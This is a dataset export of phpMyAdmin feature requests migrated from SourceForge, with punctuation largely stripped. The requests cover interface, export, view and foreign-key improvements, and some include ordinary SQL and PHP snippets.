If in your config file you have several servers set up using the same hostname but each one relating to a different database as can be the case for shared hosting), the dropdowns on the synchronize page only shows a list of the hostnames, which in this case are all the same and therefore difficult to identify which is which.
Is it possible where a database is specified in the config file for it also to show in the dropdown boxes, in a similar way to the server choice dropdown on the phpmyadmin main login screen.
Original URL https sourceforge.net p phpmyadmin feature requests 1330 Original author supersanti","enhancement"
"24444","6036","change icons in left pane based on the link target.
I know there are several reports about the changes to the default actions of the icon and text links for tables in the left navigation.
I don t have a problem with such changes.
I would like to see the icon reflect what the link does.
So, if the icon is set to show the structure seems to be the current default), then use the structure icon rather not the browse icon.
I think this would add greatly to UI consistency.
It would only need to be determined once before iterating the table list.
Original URL https sourceforge.net p phpmyadmin feature requests 1374 Original author walf","enhancement"
"24444","6037","Display structure of views.
When clicking on the structure link tab for a view, you see the structure of the result set.
It would be useful also to see the view definition.
This can be obtained from the information schema in views.view definition For bonus points !)
make this editable.
e.g.
allow the user to edit the defintion, and then execute it by prefixing CREATE OR REPLACE lt;view name gt; AS to the definition.
Original URL https sourceforge.net p phpmyadmin feature requests 1331 Original author fisharebest","enhancement"
"24444","6038","Less JavaScript, please!.
Hello guys, I love phpMyAdmin for my databases.
But the new versions of phpMyAdmin are getting worse in my opinion.
The reason JavaScript slows down the page more and more.
My customers say it, too.
Creating a table in a pop up is incredibly annoying.
I can t move or resize the popup in internet explorer and the page is in firefox slowly.
Must be an annoying pop ups for all that?
It will probably be helpful but it does not a bit, quite the opposite.
Das neue Design ist allerdings sehr xc3xbcbersichtlich!
Dafxc3xbcr ein groxc3x9fes Lob!
I hope you understand what I mean and I hope for improvement.
Thanks in advance!
Dennis1993 Original URL https sourceforge.net p phpmyadmin feature requests 1376 Original author dennis1993","enhancement"
"24444","6039","designer settings lost on navigate.
i change settings on designer toolbar, but when i navigate to other page and return back to designed, the buttons are set back to default settings.
it s very annoying to click the buttons again and again... also when i drag and drop the tables and then accidentally click on edit table button instead of collapse table button, the table layout is lost, it should auto save every minute or so Original URL https sourceforge.net p phpmyadmin feature requests 1332 Original author freeman3","enhancement"
"24444","6040","Name foreign key constraints.
MySQL allows to give an explicit name to foreign key constraints.
It would be fine if phpMyAdmin could add a field in the Relation view to view and edit this FK name.
For example the following statement ALTER TABLE X ADD FOREIGN KEY fk) REFERENCES Y id); Automatically assigns this name x ibfk 1 These automated names are assigned with an auto incrementing number, which is not predictable if we don t know in which order the foreign keys have been defined.
When we have to create SQL patches to be ran on a database, there is most often no way to know the foreign key name reliably if someone created it with phpMyAdmin!
Original URL https sourceforge.net p phpmyadmin feature requests 1333 Original author strictcoding","enhancement"
"24444","6041","Generate SQL query to use later.
Hello, Many times I want to add a new column, change another column, and add an index for the same table.
But, once the table is already large, all these changes should be made at the same time same query).
It s hard to me to make the SQL query manually, so, phpMyAdmin would help me allot if I could just generate the SQL for each change BEFORE applying.
Unfortunately, I must have a table for tests, so that I test there, and copy the generated query after it applied there, and then I accommodate it to the table I want.
So, if phpMyAdmin had this feature, I could just simulate the queries, and then I join all of them manually into a single ALTER TABLE query adding commas).
Original URL https sourceforge.net p phpmyadmin feature requests 1334 Original author anonymous","enhancement"
"24444","6042","Display description of datatypes.
When creating a new table column in HeidiSQL, it displays a brief description of each datatype as a reminder, which I find very useful.
It would be nice if phpMyAdmin could do something similar.
I attach a screenshot for clarity.
Original URL https sourceforge.net p phpmyadmin feature requests 1336 Original author anonymous","enhancement"
"24444","6043","Need to be able to edit view definition.
It s great that phpMyAdmin supports views, BUT there is no simple way to edit view definitions.
I suggest that the Structure tab of a view present the definition via SHOW CREATE VIEW) and allow it to be edited and saved.
Original URL https sourceforge.net p phpmyadmin feature requests 1338 Original author bytesmiths","enhancement"
"24444","6044","export templates.
when exporting tables from database, i have to check the same options again and again i would like to save which tables to export and which options should be checked Original URL https sourceforge.net p phpmyadmin feature requests 1339 Original author freeman3","enhancement"
"24444","6045","ReCaptcha.
Feature Request support for recaptcha Saving grace on public facing login screens to slow down the nasties.
configurable by true false of course for those not wanting it, false by default.
Thoughts?
Original URL https sourceforge.net p phpmyadmin feature requests 1382 Original author noelb","enhancement"
"24444","6046","hide tables.
Hi, Is possible to add buttons, where can hide ja unhide tables in browsing list ?
I use much PhpMyAdmin and this feature would be nice because i have many tables in db.
Original URL https sourceforge.net p phpmyadmin feature requests 1385 Original author vikingi","enhancement"
"24444","6047","Report attempts to connect to mysql with old password method.
Certain Linux distributions still use mysqld 5.0 as their current mysql server now considered old compared to 5.5).
When a new) phpmyadmin version, running on a php installation with mysqlnd driver, attempts to connect, mysqlnd complains that it will not use the old authentication method to connect to the server, and login fails no matter what username and password are provided.
In this case the user gets no indication of the compatibility problem or a suggestion to upgrade fix password hashes, but can only see the Could not login message from phpmyadmin.
The login from the command line mysql client will work just fine.
Can phpmyadmin please display an appropriate message in this case, like the warning message from php mysqlnd) ?
Together with, or Instead of, the not so specific Could not login mesage ?
See also this thread on the mailing list http thread.gmane.org gmane.comp.php.phpmyadmin.user 316 Original URL https sourceforge.net p phpmyadmin feature requests 1340 Original author toughy","enhancement"
"24444","6048","Link from Designer to database.
A link from the Designer to the current database.
If I m in the Designer, I see no way to come to the current database!
Original URL https sourceforge.net p phpmyadmin feature requests 1341 Original author dennis1993","enhancement"
"24444","6049","Remove modal window by create and delete tabled.
English I find the use of Modal Windows, in some situations extremely disturbing, as if you create a table.
Are you among the tables present a new table including the column number one, it opens a modal window and work in it is incredibly difficult!
In Internet Explorer, for example, can adjust the size of the window does not!)
Similarly, when deleting tables.
There is a security check as a Modal Window.
Usually I can hit ENTER right but not the Modal Window.
There would be a normal JavaScript Confirm) as previously much better!
I hope you unterstand me, thanks in advance! )
Original URL https sourceforge.net p phpmyadmin feature requests 1342 Original author dennis1993","enhancement"
"24444","6050","Delete old theme.
It is possible to delete the old theme original ?
I think, nobody need it because the new theme is very nice and perfect!
Original URL https sourceforge.net p phpmyadmin feature requests 1343 Original author dennis1993","enhancement"
"24444","6051","Padding for main content.
In the new 3.5 is no padding on main content.
That s not nice.
It is possible to add the padding again but only for the content?
The navbar on the top is without padding great.
I ve have attached a screenshot and marked which content need a padding.
That would be cool! )
THANKS Original URL https sourceforge.net p phpmyadmin feature requests 1344 Original author dennis1993","enhancement"
"24444","6052","Add filter to database list.
Similar to the text box filter displayed above the list of tables, it would be nice to have the same filtering abilities for databases.
Original URL https sourceforge.net p phpmyadmin feature requests 1345 Original author pb30","enhancement"
"24444","6053","Drop dialog from insert into table ajaxification.
There seems to be no point in having a jQuery UI dialog for the insert into table functionality on db structure.php as it looks ugly, and brings no extra efficiency when compared to the ajax loaded pages.
Original URL https sourceforge.net p phpmyadmin feature requests 1392 Original author roccivic","enhancement"
"24444","6054","Please display Show all button by default.
It is currently painful to show all records in a table as discussed in 3216130).
One needs to look at the number of rows, enter that number in the field which asks the number of rows to show, then reset the starting row to 0 and press enter.
There is actually a Show all button to do just that, the problem is that the button does not show by default.
A configuration option needs to be enabled cfg[ ShowAll ] boolean Defines whether a user should be displayed a show all rows) button in browse mode or not.
http www.phpmyadmin.net documentation This option is disabled by default.
The question is what disadvantages showing this button has.
There is certainly a complexification of the interface, but this button is clearly worth it.
It wouldn t take more actual space, as it uses the same line as other widgets Page number).
The only real disadvantage I can see is the performance cost of offering users to display all rows of a big table.
This is not a security issue as users can already request all records by crafting a query as they want.
But this button makes it easier for the user to involuntarily abuse resources.
I believe this could be solved by warning the user his query may take a long time, for example with a JavaScript popup.
Such a popup would have an efficiency cost something should be done so that it can be gotten rid of for example, Yes, and do not ask me again ).
Original URL https sourceforge.net p phpmyadmin feature requests 1347 Original author chealer","enhancement"
"24444","6055","insert as new row enhancement.
when i select insert as new row at the bottom of insert data page, it should automatically empty primary key data field id column) Original URL https sourceforge.net p phpmyadmin feature requests 1348 Original author freeman3","enhancement"
"24444","6056","Null checkbox behavior.
When you already have a not null column in a table click edit and uncheck the null checkbox.
You will get this error 1067 Invalid default value for user The sql syntax that PHPMyAdmin is trying to use is ALTER TABLE `email` CHANGE `user` `user` VARCHAR 255 ) CHARACTER SET latin1 COLLATE latin1 swedish ci NOT NULL DEFAULT NULL It should be ALTER TABLE `email` CHANGE `user` `user` VARCHAR 255 ) CHARACTER SET latin1 COLLATE latin1 swedish ci NOT NULL It doesn t matter what kind of column it is.
All the values are filled in.
the problem is that it is using DEFAULT NULL at the end when you are removing NULL using the phpmyadmin interface.
Original URL https sourceforge.net p phpmyadmin feature requests 1349 Original author stokescomp","enhancement"
"24444","6057","Centralized PMA database.
I have several slaves I would like to setup a PMA interface for and enable extra features such as history and bookmarks stored in the PMA db.
Currently I can only specify a database to house that information; it defaults to the same server as that it s browsing.
This presents a couple problems 1\.
I cannot read my slaves in read only mode as the pma user needs to write to this meta db 2\.
I have to create all these superfluous databases around my slaves, cluttering things up, and generally making me sad.
I d like to be able to specify a secondary server for the pmadb and have this shared db hold information for all the hosts I configure.
Original URL https sourceforge.net p phpmyadmin feature requests 1350 Original author atxdba","enhancement"
"24444","6058","draggable columns vs copy column name.
Can you add option to remove possibility drag table columns in result of sql queries?
Or change this function for return possibility select name of column?
thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 1351 Original author sailormax","enhancement"
"24444","6059","Export for triggers only.
I d like to request another option on the custom export method form to allow for exporting just the trigger code from the database.
As it stands now, custom scripts must be created to parse all the CREATE TRIGGER sections of code out of an export or manually exporting the triggers one at a time in the Triggers tab of the interface).
Since one can t enable disable triggers in mySQL, this would make it easier to construct drop create scripts for all triggers when doing data imports, etc.
I think that mysqldump can do this via the triggers option, but I d prefer to use this tool for all my mySQL needs!
Original URL https sourceforge.net p phpmyadmin feature requests 1403 Original author umdesch4","enhancement"
"24444","6060","Show table group if there is only one.
If tables get group by LeftFrameTableSeparator and there is only one group it should be open by default.
Original URL https sourceforge.net p phpmyadmin feature requests 1352 Original author lord rod","enhancement"
"24444","6061","Browsing the site, while export is processing.
The PHPMyAdmin is a great tool, however when exporting it is not possible to browse any pages on the site as the SESSION is loaded) Would it be possible to session write close ) before folowing comment line 515) Builds the dump and session start ) right after the if else if else statement before if !PMA exportFooter )) statement.
this would allow user to browse the phpmyadmin interface and still do the export possibly only applicable for file exports) My version of the phpmyadmin is 3.4.11.1deb1 Original URL https sourceforge.net p phpmyadmin feature requests 1404 Original author letynsoft","enhancement"
"24444","6062","Find and Replacing column wise.
Usually I am using PhpMyAdmin for managing may MySQL databases, I think it is better to have Find and Replace for data of table s columns.
If we can select a column and the find particular word string and then replace with some other string through GUI, that will be very helpful.
But I was wandering , this feature is available or not.
Did I miss something related to find and replace feature or please give your suggestion to this.
Best Regards, Isuru Madhushankha Original URL https sourceforge.net p phpmyadmin feature requests 1405 Original author isurumadhu","enhancement"
"24444","6063","Export all privileges.
Hi there, It would be very useful if I could export all users privileges grants with a 1 click button, rather than having to go through each individually and click Export.
If you Google MySQL export privileges , you ll come up with loads of results where people are wanting the same thing some even in phpMyAdmin).
Thanks Danny Original URL https sourceforge.net p phpmyadmin feature requests 1353 Original author conquerthis","enhancement"
"24444","6064","Key Cache Status.
Ordering of the rows is a bit weird.
Could read ratio be moved to below reads?
Same for write ratio?
What s key buffer fraction ?
It s 18.24 while both blocks used and blocks unused is 214.3 k. Original URL https sourceforge.net p phpmyadmin feature requests 1355 Original author olafvdspek","enhancement"
"24444","6065","Hide button text option.
The button text in the browse table consumes lots of precious space.
Could you add an option to hide the text to settings)?
Buttons like Edit, Inline Edit, Copy and Delete.
Original URL https sourceforge.net p phpmyadmin feature requests 1357 Original author olafvdspek","enhancement"
"24444","6066","Creating a view from an empty set of results.
phpMyAdmin does not allow to create a view from a query which has returned an empty set of results.
It is a bug.
I should be able to create a view even when my tables are yet empty without the need to add some testing data into my tables.
Original URL https sourceforge.net p phpmyadmin feature requests 1412 Original author porton","enhancement"
"24444","6067","Ctrl navigation in Create table form.
The Create table form could allow navigating with Ctrl Arrow keys, as is possible in the tbl change.php row editor.
Original URL https sourceforge.net p phpmyadmin feature requests 1358 Original author mynetx","enhancement"
"24444","6068","Ctrl navigation in grid editor.
The JS grid editor could allow navigating with Ctrl Arrow keys, as is possible in the tbl change.php row editor.
Would this interfere with any blur events that autosave the field with Ajax?
Original URL https sourceforge.net p phpmyadmin feature requests 1359 Original author mynetx","enhancement"
"24444","6069","Session Upload Progress PHP 5.4).
PHP 5.4 supports Session Upload Progress, see http ca2.php.net manual en session.upload progress.php.
So a new module supporting this should be added to libraries import upload and libraries display import ajax.lib.php.
Original URL https sourceforge.net p phpmyadmin feature requests 1360 Original author lem9","enhancement"
"24444","6070","Support more than one separating character on CSV import.
CSV Import of CVS file; typically having format 0, a , b , c , 33 1, x , d , f , 23 Using ` , ` as value for Columns separated with gives error Invalid parameter for CSV import Columns terminated by Same in 3.5.5, upgraded to 3.5.7, and no better.
Similar query in mysql cli mysql> LOAD DATA INFILE res base csv sysfs pt.csv INTO TABLE sysfs pt COLUMNS TERMINATED BY , OPTIONALLY ENCLOSED BY LINES TERMINATED BY \n ; Query OK, 256 rows affected 0.10 sec) Records 256 Deleted 0 Skipped 0 Warnings 0 Haven t had the time to look into what is causing it, so post with no more Original URL https sourceforge.net p phpmyadmin feature requests 1418 Original author z0l0ft","enhancement"
"24444","6071","merging databases and or tables.
please add an option to merge databases pick a row to base it off of, select whether to override or to skip repeats, and select rows to reset to default if you want to if it was an auto increment row, the set to default would automatically increment it)) this would be great for some two database that had repeats and you liked what one had, but didn t want to lose what the other had Original URL https sourceforge.net p phpmyadmin feature requests 1361 Original author anonymous","enhancement"
"24444","6072","Shortlink support.
It would be handy to have shortlink support for queries.
The closest thing available now is creating a bookmarked query.
For convenience of IM ing emailing results around it d be nice to be able to send a link for the result set you were looking at.
To clarify I m not looking for a way to cache the state of a resultset at any certain point in time; just a direct phpmyadmin link with the query I want to send.
Original URL https sourceforge.net p phpmyadmin feature requests 1362 Original author atxdba","enhancement"
"24444","6073","TABLE SCHEMA names are not quoted correctly.
TABLE SCHEMA names are not quoted correctly in PMA currentUserHasPrivilege ).
If the table name contains an underscore e.g.
db 1 ), it will be stored as db\ 1 in the SCHEMA PRIVILEGES table.
PMA currentUserHasPrivilege ), however, does not consider this and thus does not retrieve the privileges correctly.
Quick and dirty fix in common.lib.php at line 3754 PMA sqlAddSlashes str replace , \ , db)) instead of just PMA sqlAddSlashes db) Original URL https sourceforge.net p phpmyadmin feature requests 1364 Original author leofeyer","enhancement"
"24444","6074","show creation, update, check times in db structure.
Add an option to show the last edited date for all tables in db structure, allow sorting by these dates Original URL https sourceforge.net p phpmyadmin feature requests 1365 Original author mynetx","enhancement"
"24444","6075","Allow disabling CodeMirror in settings.
As CodeMirror does not allow using middle click for pasting see bug https sourceforge.net tracker index.php?func=detail aid=3516302 group id=23067 atid=377408), provide switch to turn it off.
Original URL https sourceforge.net p phpmyadmin feature requests 1366 Original author mynetx","enhancement"
"24444","6076","Move columns easily.
Change the order of columns in a table permanently by dragging them into the desired position.
Original URL https sourceforge.net p phpmyadmin feature requests 1367 Original author mynetx","enhancement"
"24444","6077","More options for ProtectBinary.
This hasn t been revisited in a long time.
The cfg[ ProtectBinary ] = blob option gives me the opposite of what I need.
I would like to be able to edit or actually just delete) blob fields but NOT other binary fields.
Perhaps a noblob option?
Original URL https sourceforge.net p phpmyadmin feature requests 1368 Original author roblewis","enhancement"
"24444","6078","BSD support in sysinfo.lib.php.
The file libraries sysinfo.lib.php have support only for Linux and Windows, I would like to have support added for BSD operating systems too.
Original URL https sourceforge.net p phpmyadmin feature requests 1369 Original author gbechis","enhancement"
"24444","6079","special icon for federated tables.
It would be a great feature to add a small icon like the ones used for shortcuts) for federated tables in the sidebar.
Original URL https sourceforge.net p phpmyadmin feature requests 1370 Original author pcdwarf63","enhancement"
"24444","6080","remove ... from create database box.
i think it would be nice to get rid of the ... on the end of the database name in the existing create database area when things are set to only allow user databases to be created.
having the user already filled is great, but having to delete the ... doesn t seem like it adds any usefulness.
Original URL https sourceforge.net p phpmyadmin feature requests 1429 Original author q7joey","enhancement"
"24444","6081","Inline editing by double click.
Currently pma 3.5.0) grid editing in browse mode is started on click.
This can be annoying for some users, f.e., they fear important table data can be accidentally damaged.
Another bad thing is unexpected starting edit mode when trying to select some text in grid to copy it to clipboard).
It would be good to support 3 configuration modes of Grid editing On click current behavior), On double click, Disable.
While there s no this useful setting, I replaced in js makegrid.js g).find td.data ).click .. with g).find td.data ).dblclick Original URL https sourceforge.net p phpmyadmin feature requests 1371 Original author arcadius radius","enhancement"
"24444","6082","Engine ndbcluster now support foreign keys > Relation View menu should be showed.
Hi, mysql cluster database engine ndbcluster since 7.3 supports foreign keys, so there should be enabled menu Relation View in Structre of tables with this engine.
You should modify function isForeignKeySupported in file libraries Util.class.php and add ndbcluster to supported engines for foreign keys since version 7.3 NBD version can be fetched via SQL SHOW VARIABLES WHERE `Variable name` = ndb version string Kind regards, Dean Original URL https sourceforge.net p phpmyadmin feature requests 1433 Original author dincek","enhancement"
"24444","6083","clickable links to open pdf files from fields.
I wish there was a way I could set up a fields such that I could include column s) with clickable links that would open pdf or other files such as open office files) from the browsing view of the database table.
I would like to be able to include working hyperlinks that would open application files similar as the way such links work from say calc.
This functionality would be similar as that for clickable image links but would allow me to view pdf files.
Original URL https sourceforge.net p phpmyadmin feature requests 1372 Original author montanaembassy","enhancement"
"24444","6084","Adding query history using browser s localStorage.
One painful aspect of working on phpmyadmin for our team was to lose our hard formed, 8 line queries during session timeouts.
Hence I created a Chrome Extension and a Firefox addon to save the queries in browser s localStorage and make them searcheable.
I turned the query textarea itself into an autocomplete.
I thought I would integrate this feature into phpmyadmin itself.
Check out my extensions on https chrome.google.com webstore detail ffimgldnoigmlcofmfkfcjechbdkipph?utm source=chrome ntp icon and https addons.mozilla.org en US firefox addon dlq ?src=ss and use them with phpmyadmin.
Also check them with phpminiadmin to see the slick UI and accessibility I have added using twitter bootstrap, currently not implemented on phpmyadmin since addon requires DOM manipulation and phpminiadmin and phpmyadmin have different DOM structures.
Please take a decision if phpmyadmin is willing to accept this enhancement.
I shall integrate it with the code and send a pull request on github.
Original URL https sourceforge.net p phpmyadmin feature requests 1375 Original author anonymous","enhancement"
"24444","6085","Split the variable Replicate Do Table spaces.
When replicated many tables, the table of replication status is extended to multiple screens.
You can add a function PMA replication print status table partition of space into a variable Replicate Do Table.
echo \{ server \{ type\} replication \}[0][ variable]; \ if variable == Replicate Do Table ) \ echo preg replace , , , , \{ server \{ type\} replication \}[0][ variable]); \ else \ echo \{ server \{ type\} replication \}[0][ variable]; Original URL https sourceforge.net p phpmyadmin feature requests 1377 Original author alexey dv","enhancement"
"24444","6086","Structure Info weird header.
The Row Statistics table has Statements and Value headers.
What s Statements supposed to be?
I think there s no need for that header.
Same for Space usage.
Original URL https sourceforge.net p phpmyadmin feature requests 1378 Original author olafvdspek","enhancement"
"24444","6087","Add User dialog .
Add User is shown as a resizable dialog with a scrollbar, defaulting to a size 50 of my screen and not remembering it s size.
What s the rationale to use a dialog for this?
The previous behaviour, a normal, full, page provided a much better user experience.
Could you offer this far better experience again?
Original URL https sourceforge.net p phpmyadmin feature requests 1379 Original author olafvdspek","enhancement"
"24444","6088","Support for Paramaters with raw SQL.
It would be great to have support for using bound paramaters in the raw SQL dialogues.
This would be good so that you could copy paste queries from a program you are working on for debuging purposes without having to remember to replace all of the place holders with values and vice versa when copying working queries into your code) Original URL https sourceforge.net p phpmyadmin feature requests 1380 Original author anonymous","enhancement"
"24444","6089","IPv6 nets in cfg[ Servers ][ i][ AllowDeny ].
It would be great that AllowDeny in config.inc.php work with IPv6.
It seem to work with a full adress but not with a network tried with the last git version).
Do you plan to support it ?
please say yes ;)) Original URL https sourceforge.net p phpmyadmin feature requests 1381 Original author anonymous","enhancement"
"24444","6090","Script Import Timeout.
On a site I m working on, the import file is a bit large 31MB.
However there are much larger DBs than this one.
I get the error Script timeout passed, if you want to finish import, please resubmit same file and import will resume.
which is fine, and I can select the file and continue the import again.
However, it would be appreciated if the script used some AJAX handling or auto redirecting to avoid timeout issues.
Original URL https sourceforge.net p phpmyadmin feature requests 1383 Original author anonymous","enhancement"
"24444","6091","Include Previous Themes As Part Of New Release.
My webhost has stated that they will only use the installed themes that are shipped with phpMyAdmin.
On a shared server, they will not install any other themes.
I ve sought to move to a different webhost and those that meet all of my other needs for a webshost have the same policy in which they simply offer only the themes that are shipped with phpMyAdmin.
Having a bit of color blindness, I ve become attached to the Darkblue Orange theme but this theme is no longer part of the standard install for v. 3.4.10.1.
Please include this these as a part of the standard installation shipped version of phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin feature requests 1384 Original author gsgsoln","enhancement"
"24444","6092","CREATE DATABASE should be CREATE DATABASE IF NOT EXISTS.
on the database operations tab, there is tick box that says CREATE DABASE before copying while copying a database.
However, this operation fails if the Database in question already exists for example, an empty database ).
I believe that this operation should instead be CREATE DATABASE IF NOT EXISTS, fixing the failing operation Original URL https sourceforge.net p phpmyadmin feature requests 1386 Original author anonymous","enhancement"
"24444","6093","Add use create database to export.
I know there was a feature request with the ID ID 1031217 and I tried the solution mentioned in the comments.
But there I have no opportunity to change the database name.
If you have webspace or a managed server than you have mostly use the name scheme what is given by the hoster.
Actually I had to move a 6GB database and it was a pain to edit this large file just to put the use databasename in.
So please can you provide a form field where I can put in a new database name for the use query.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 1387 Original author liox","enhancement"
"24444","6094","Restore defaultpropdisplay ?.
RestorePropDisplay was removed recently.
This results in a lot of horizontal scrolling when creating or editing fields.
Is there any prospect of this feature being restored, please ?
Original URL https sourceforge.net p phpmyadmin feature requests 1388 Original author ramasaig","enhancement"
"24444","6095","Client Certificate Authentication to log into PMA.
phpMyAdmin needs a feature which allows you to log into phpMyAdmin using a client certificate instead of a password.
Original URL https sourceforge.net p phpmyadmin feature requests 1389 Original author mp5shooter","enhancement"
"24444","6096","Export tables list must be ordered by constraints.
If so no need disable foreign key checks on export.
lt;?php query=mysql list tables db, dbid); for i=0; i lt;mysql num rows query); i ) tables[current mysql fetch row query))]=0; mysql free result query); query=mysql query SELECT `REFERENCED TABLE NAME`,`TABLE NAME` FROM ` schema`.`KEY COLUMN USAGE` WHERE `TABLE SCHEMA` = db AND `REFERENCED TABLE SCHEMA` IS NOT NULL AND `TABLE NAME` lt; gt; `REFERENCED TABLE NAME` ORDER BY `REFERENCED TABLE NAME` , dbid); for i=0; i lt;mysql num rows query); i ) constraints[current t=mysql fetch assoc query))][]=next t); mysql free result query); again=true; while again) if !
again=false) foreach constraints as table= gt; rel) foreach rel as t) if tables[ table] lt;= tables[ t]) tables[ table] ) again=true)) break; asort tables); i=0; foreach tables as k= gt; v) tables[ k]= i ;unset k);unset v);unset i); tables=array flip tables); mysql close dbid); ?
gt; Original URL https sourceforge.net p phpmyadmin feature requests 1390 Original author dev5er6","enhancement"
"24444","6097","Easy access to SHOW CREATE ... .
I would like to request the ability to easily perform a show create on an table view etc and have the full definition displayed.
Possibly under the database level view, utilizing the with selected dropdown.
I would find this particularly helpful when dealing with large amounts of views.
Especially when editing the view requires overwriting the definition, having to perform a show create view sql query, click options, show full texts, click go, click on box to view full definition that requires quite a few steps.
Original URL https sourceforge.net p phpmyadmin feature requests 1445 Original author gabeguillen","enhancement"
"24444","6098","Paradice theme compatible with current version.
Would love to have the theme Paradice working with 3.5.X.
Original URL https sourceforge.net p phpmyadmin feature requests 1391 Original author justink101","enhancement"
"24444","6099","Drop cfg[ AjaxEnable ].
As already agreed on the phpmyadmin devel mailing list, the cfg[ AjaxEnable ] configuration directive no longer makes sense as in pma 4.0 almost all requests will be served via ajax anyway.
Original URL https sourceforge.net p phpmyadmin feature requests 1393 Original author roccivic","enhancement"
"24444","6100","Parallel scripts loader in ajax.js.
Currently, the script loader from ajax.js loads 1 script at a time.
This is quite robust, but unefficient and it would be better to be able to load several scripts in parallel.
Although this enhancement is not that simple, as the jQuery .getScript ) function sometimes fires 1 callback when several scripts are downloaded around the same time.
Original URL https sourceforge.net p phpmyadmin feature requests 1394 Original author roccivic","enhancement"
"24444","6101","Alphabetical tables pager.
I have a lot of field tables, and few others.
The navigation is very hard with current pager.
It s also hard without it, because there are thousands of tables.)
I suggest to switch tables pager which appears in the left frame when there is too much tables) from numeric to alphabetical.
So, the items could be a c d f 1) f 2) f 3) g z Actually, I don t know if it s the best idea.
Maybe someone will suggest more useful solution.
Original URL https sourceforge.net p phpmyadmin feature requests 1395 Original author leksat","enhancement"
"24444","6102","Support MySQL 5.6 SHA256 secure password.
See http blog.ulf wendel.de 2012 mysql 5 6 sha256 secure password support for php mysqlnd and determine which changes need to be done.
Original URL https sourceforge.net p phpmyadmin feature requests 1396 Original author lem9","enhancement"
"24444","6103","datetime,timestamp incompatibilities.
MySQL 5.6 has added milliseconds to datetime and timestamp and PHPMyAdmin doesn t support these changes ... DATETIME 6), Original URL https sourceforge.net p phpmyadmin feature requests 1397 Original author anonymous","enhancement"
"24444","6104","Improve handling of missing function in ImportXml.
ImportXml has a check for function exists libxml disable entity loader ) before the class is declared.
However if it does not exist, it just returns.
This leads to a class not found error on the Import page.
It d be nice if instead it threw an exception or some sort of error indicating what the actual problem is.
Original URL https sourceforge.net p phpmyadmin feature requests 1450 Original author pb30","enhancement"
"24444","6105","Navi panel and current table.
I noticed that in some situations, for example following a foreign link or picking a table from the output of db structure.php, the navi panel does not position itself to the new table.
Example 1 in navi, click on sakila in main, click on the Browse Action on the actor line navi should show that actor is the current table Example 2 in navi, click on sakila in navi, under sakila, click on Tables then click on inventory in main, for inventory id 1, click on the film id 1 now, in main you are seeing a row from film, but the navi panel no longer shows that the current db is sakila Original URL https sourceforge.net p phpmyadmin feature requests 1398 Original author lem9","enhancement"
"24444","6106","No hard coded icons in css files.
There are a whole bunch of image urls that are hard coded into the css files there are at least 7 icons in main.php alone).
These cause extra http requests with the page load, which are by the way completely pointless since at that point we would have already loaded the sprites.
So if we can replace such ways of displaying icons with calls to PMA Util getImage ) somewhere on the server side, we can speed up loading times on several pages by not loading redundant icons.
Attached is a network graph showing the unnecessary http requests.
Original URL https sourceforge.net p phpmyadmin feature requests 1399 Original author roccivic","enhancement"
"24444","6107","Drop dom drag.js.
The dom drag.js file is used by the User Schema class.
I think that we could just use the jquery jquery.event.drag 2.2.js library instead there, as it has similar functionality, and the drop the dom drag.js script altogether from our code base.
Original URL https sourceforge.net p phpmyadmin feature requests 1400 Original author roccivic","enhancement"
"24444","6108","Add ability to write the comments for table indexes.
Add ability to write the comments for table indexes Original URL https sourceforge.net p phpmyadmin feature requests 1401 Original author anonymous","enhancement"
"24444","6109","no button to delete unwanted coloumns when creating table.
When creating a new table, first we have to enter table name and number of columns.Then after click GO it popup diagram asking about the table details.Here if we click on GO button other than Save button it create at least one column.And if we need to delete newly created column at that place,there is no functionality for that.And that is horrible.If we can close button X) for each column created easily we can delete unwantedly generated columns at there.
Original URL https sourceforge.net p phpmyadmin feature requests 1402 Original author shamika09","enhancement"
"24444","6110","foreign key management tool.
Actually, you cannot delete columns attributes of a table which referes a foreign key unless executing the command ALTER TABLE `tablename` DROP FOREIGN KEY fk identifier , then deleting the index and the column.
What I desire is a management tool for foreign keys of a table database.
Original URL https sourceforge.net p phpmyadmin feature requests 1406 Original author macwinnie","enhancement"
"24444","6111","Add ability to define column location when adding a new column.
I really like the ability to add a column from the left hand tree navigation.
Definitely a good addition!
However, I m afraid that without the ability to control where that column will appear in the database it makes our ability to organize our databases a little more difficult.
In fact, I can t seem to find the ability to create a column from anywhere else.
Again, good move, but I think controlling what field it becomes after or before will be important.
Original URL https sourceforge.net p phpmyadmin feature requests 1407 Original author webnet668 Attachment http sourceforge.net p phpmyadmin feature requests 1407 attachment add column.png","enhancement"
"24444","6112","suggest data in the database when executing a query.
It is best if phpmyadmin suggest the data that in the table on the selected database, when executing query in SQL window.
For an example, there is a database with field id and it have 1,2,3.
If i go to SQL window and type select From table Where id=<here phpmyadmin can suggest data 1,2,3> Original URL https sourceforge.net p phpmyadmin feature requests 1409 Original author madurapradeep","enhancement"
"24444","6113","AES ENCRYPT w Salt.
When you insert a row with a blob field, the blob field gives you a drop down of possible surrounds like DES ENCRYPT, PASSWORD, ENCRYPT, etc etc... Would it be possible to have AES ENCRYPT added as well as a Salt key input box shown when it s possible to add a Salt to a password?
Many thanks Original URL https sourceforge.net p phpmyadmin feature requests 1410 Original author ccsalway Attachment http sourceforge.net p phpmyadmin feature requests 1410 attachment Capture.PNG","enhancement"
"24444","6114","Explain analyzer.
MariaDB offers tool to help understanding EXPLAIN output.
It would be great to integrate something like this in phpMyAdmin.
Example https mariadb.org explain analyzer analyze yucyd Original URL https sourceforge.net p phpmyadmin feature requests 1413 Original author nijel","enhancement"
"24444","6115","missing option controlport.
phpmyadmin lacks config option controlport.
It has control host so there is no reason not to make controlport.
Control database can be on mysql host with non 3306 port!
Original URL https sourceforge.net p phpmyadmin feature requests 1414 Original author nandmaster","enhancement"
"24444","6116","config.inc.php proxy settings for version check.php.
The upgrade discussed at https github.com phpmyadmin phpmyadmin pull 114 broke our ability to automatically check for updates on phpMyAdmin.
The previous mechanism caused the update check to happen on the client computer, which utilized the browser proxy server if applicable.
The new version assumes that the PHP server has unfettered internet access and moves the update check server side.
This is fine, except for when the server lives behind a proxy environment.
To address this new bug, it is suggested that optional parameters be added to the config.inc.php file to allow setting proxy server information in order to allow those requests to do an update check.
It is against our company policy to allow unfettered internet access from our servers, so globally setting proxy information at a server level is not an option.
Original URL https sourceforge.net p phpmyadmin feature requests 1416 Original author dlernstrom","enhancement"
"24444","6117","Suggestion about database export.
Hi, It is somthing not really usefull when the export includes views filling view has is not appropriate, a view has already his own content each time is used.
